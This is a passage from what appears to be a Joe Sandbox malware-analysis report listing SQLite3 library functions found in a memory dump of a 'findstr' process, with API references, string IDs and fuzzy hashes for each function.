                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465156292-0
                                                                                                    • Opcode ID: f7397990cb8f4735516e67a842428728896adeefcd72f3ca45d60648d203133c
                                                                                                    • Instruction ID: d73cb010d410a2bc9b4276e3d008bfb39c5fc10e05299700e233f618a552f752
                                                                                                    • Opcode Fuzzy Hash: f7397990cb8f4735516e67a842428728896adeefcd72f3ca45d60648d203133c
                                                                                                    • Instruction Fuzzy Hash: 2BE0EC74A04249ABDB04EF75D8C194AB7B8FF88258F24D266ED484B305E335E995CB81
                                                                                                    Function 61E29093 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 61E290B2
                                                                                                      • Part of subcall function 61E29044: sqlite3_mutex_leave.SQLITE3 ref: 61E29083
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3064317574-0
                                                                                                    • Opcode ID: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
                                                                                                    • Instruction ID: 31c8539179373c39573777e49d3d6abece5f7cdaa41fe19468cbefd9aa03d983
                                                                                                    • Opcode Fuzzy Hash: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
                                                                                                    • Instruction Fuzzy Hash: 83D06CB4909749ABCB00EF29C48584ABBE4AB88354F40C82DB898C7310E678E8408B92
                                                                                                    Function 61E28F4B Relevance: .0, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3c721071017a1033471f85d389a30210b9ed8f07119d2198b79a33a88c619c48
                                                                                                    • Instruction ID: 2dbe541029b73f46102848747f0a56b1243f951bd8432f9599b318539191e2b3
                                                                                                    • Opcode Fuzzy Hash: 3c721071017a1033471f85d389a30210b9ed8f07119d2198b79a33a88c619c48
                                                                                                    • Instruction Fuzzy Hash: E3012872A0421E9BCF00DE49D891ADEBBB5FB88364F64812AF91497341C275E952CBE0
                                                                                                    Function 61E28EDD Relevance: .0, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4f5fac0df7391be7681725dc59cc5a154345831af7e83db8f2e7eea72c29f52b
                                                                                                    • Instruction ID: 282de9a5ea8c72b991077da7f6bfb8b3368330fbb4a78aefb3cdf304fc295895
                                                                                                    • Opcode Fuzzy Hash: 4f5fac0df7391be7681725dc59cc5a154345831af7e83db8f2e7eea72c29f52b
                                                                                                    • Instruction Fuzzy Hash: E8F01C756082199BDB04DE08E8A0A9A7BE5FB08374F20C12AFC2587780C671E9508BD0
                                                                                                    Function 61E13A33 Relevance: .0, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bec25b551eb354892b9af8da31309813ac55e7b9a464165a5093f9e8343794bc
                                                                                                    • Instruction ID: 2813161d6bdb955eaf3ab68c1a7d03ab9169fce3e62afef336c5361aec6f7a92
                                                                                                    • Opcode Fuzzy Hash: bec25b551eb354892b9af8da31309813ac55e7b9a464165a5093f9e8343794bc
                                                                                                    • Instruction Fuzzy Hash: A7D012777093085F7B00CD99ACC0626779AE788238B30C336ED1C87309D532DC108594
                                                                                                    Function 61E28FB8 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4a16c13c49520f40f0d60a905d10e97620d50312b1343a0282da68c3504f34f1
                                                                                                    • Instruction ID: b102c9bc9f6e664d14128b601affc410d9f98154bbcd73b306bd9b71fb2a438c
                                                                                                    • Opcode Fuzzy Hash: 4a16c13c49520f40f0d60a905d10e97620d50312b1343a0282da68c3504f34f1
                                                                                                    • Instruction Fuzzy Hash: FAD042B450530DABDB00CF05D8C599ABBA4FB08264F508519FD1847301C371E9508AA0
                                                                                                    Function 61E28F24 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d14c322e95e75edd63900fddb1959088059b19c42da3efe683381bed354797be
                                                                                                    • Instruction ID: dce98d3074e2cd64e076945d3adbdb6e0cf8e92e3b7b92136b659279ffc19a3f
                                                                                                    • Opcode Fuzzy Hash: d14c322e95e75edd63900fddb1959088059b19c42da3efe683381bed354797be
                                                                                                    • Instruction Fuzzy Hash: FBD042B450530DABDB00CF05D8C099ABBA4FB08364F508519FD1847301C371E9508AA0
                                                                                                    Function 61E03568 Relevance: .0, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d1597ba08e16207bc585f88e41cad08ce7166ad2665480622a7a6546a95354c9
                                                                                                    • Instruction ID: cb7424858764b716d9f35c55a2eb3f01ce31a55af644a028291814028747478a
                                                                                                    • Opcode Fuzzy Hash: d1597ba08e16207bc585f88e41cad08ce7166ad2665480622a7a6546a95354c9
                                                                                                    • Instruction Fuzzy Hash: DBC08C3035430C8F6B00CEFEE440D6237E8AB04B20710C050E818CBB20D631FDA08580
                                                                                                    Function 61E03556 Relevance: .0, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                                                                                    • Instruction ID: ff50fd2c8bf0e8bd2a405e50f4e867cb0310499d3bbc8f69fcb86d8fc05bc264
                                                                                                    • Opcode Fuzzy Hash: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                                                                                    • Instruction Fuzzy Hash: 81B0922061820A8B6B08CE98D480A7777AEBB88D05B28C465A81C8AA05F732E99192C0
                                                                                                    Function 61E3898C Relevance: 40.5, APIs: 16, Strings: 7, Instructions: 209COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E389FE
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E38A2F
                                                                                                      • Part of subcall function 61E234E3: sqlite3_vsnprintf.SQLITE3 ref: 61E23504
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38B73
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38BB0
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E38BEB
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E38C1D
                                                                                                    • sqlite3_randomness.SQLITE3 ref: 61E38C39
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_randomnesssqlite3_vsnprintf
                                                                                                    • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5$a
                                                                                                    • API String ID: 3041771859-3248843131
                                                                                                    • Opcode ID: 50c7ec4dc8a25c6785e2b51e4ddcf930e9a6e30049a517b36d7cb5319b3f4d31
                                                                                                    • Instruction ID: abafcc9714c379ba19c9e67da93a23627e6cfc4ab902c227fd710b7298a482b1
                                                                                                    • Opcode Fuzzy Hash: 50c7ec4dc8a25c6785e2b51e4ddcf930e9a6e30049a517b36d7cb5319b3f4d31
                                                                                                    • Instruction Fuzzy Hash: 588181B4508B528FD7019F79849076EBBE1AFC5358F64CA2DE48ACB341D778C842DB52
                                                                                                    Function 61E26520 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 189COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_is_nt
                                                                                                    • String ID: Ta$\$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                                    • API String ID: 3752053736-69930158
                                                                                                    • Opcode ID: 5eff7c9c25b58d4a3e0d0cc3db851835b1dcf4915bf27e234cc7484c72de89c9
                                                                                                    • Instruction ID: 34c1aadcd0b05abf5c8eb0e98a67fc7ce766256b3763d4704be87ef9d6959e13
                                                                                                    • Opcode Fuzzy Hash: 5eff7c9c25b58d4a3e0d0cc3db851835b1dcf4915bf27e234cc7484c72de89c9
                                                                                                    • Instruction Fuzzy Hash: 957148B0A087859FD701EF69C59465EBBF1BF89358F20C92DE8998B340E734C8468F52
                                                                                                    Function 61E24E50 Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 132COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24E6A
                                                                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24E76
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E24E83
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24EAB
                                                                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24EB7
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E24EC6
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24EE6
                                                                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24EF2
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E24F01
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24F2D
                                                                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24F39
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E24F47
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmpsqlite3_value_intsqlite3_value_numeric_type
                                                                                                    • String ID: ba
                                                                                                    • API String ID: 2723203140-705669676
                                                                                                    • Opcode ID: 8065581ee7c8842dd90299b6c890b2a322b529472db7c320ef97db7bf2859eb7
                                                                                                    • Instruction ID: d54c0122329b737557f9b67c7c256ab4ab34b4cfa4b08d1edb183239c10717eb
                                                                                                    • Opcode Fuzzy Hash: 8065581ee7c8842dd90299b6c890b2a322b529472db7c320ef97db7bf2859eb7
                                                                                                    • Instruction Fuzzy Hash: B14139B0908B868BD310AF6589A0A6EFBF5BFC435CF75D82ED4858B350E774D4818B42
                                                                                                    Function 61E356CA Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 284COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mprintf$sqlite3_snprintf$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                                                                    • String ID: .$sqlite3_extension_init$te3_
                                                                                                    • API String ID: 2803375525-613441610
                                                                                                    • Opcode ID: fc2e406580ae9f7855b2a127e9c2fb747acef99e7fc0bbedc9332d2892439615
                                                                                                    • Instruction ID: 04f1e3877506af8ff47856cdec80fb3f71ee56868066f97f76fabb90c2c26a2a
                                                                                                    • Opcode Fuzzy Hash: fc2e406580ae9f7855b2a127e9c2fb747acef99e7fc0bbedc9332d2892439615
                                                                                                    • Instruction Fuzzy Hash: C1C1D4B4A05359DFDB01DFA8D48469EBBF1AF88358F24C42AE8989B350D774D941CF82
                                                                                                    Function 61E35227 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc64$sqlite3_freesqlite3_vfs_find
                                                                                                    • String ID: @$access$cache$foa
                                                                                                    • API String ID: 1538829708-2673072753
                                                                                                    • Opcode ID: abbc32230430ae696cb5aca4d9d97a032b7eee6ab10dbbc8eeaa814d0401cb14
                                                                                                    • Instruction ID: 7eda09881f9fc5488be974248a21a4fe8ca159e8d76fb4508884b556af9e7493
                                                                                                    • Opcode Fuzzy Hash: abbc32230430ae696cb5aca4d9d97a032b7eee6ab10dbbc8eeaa814d0401cb14
                                                                                                    • Instruction Fuzzy Hash: 27D13DB09083658FDB118FA8C4807AEBBF2AFC9308F64C45DD895AB345D779D845CB52
                                                                                                    Function 61E52882 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 154COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E528ED
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E528F8
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E528D6
                                                                                                      • Part of subcall function 61E35200: sqlite3_initialize.SQLITE3 ref: 61E35206
                                                                                                      • Part of subcall function 61E35200: sqlite3_vmprintf.SQLITE3 ref: 61E35220
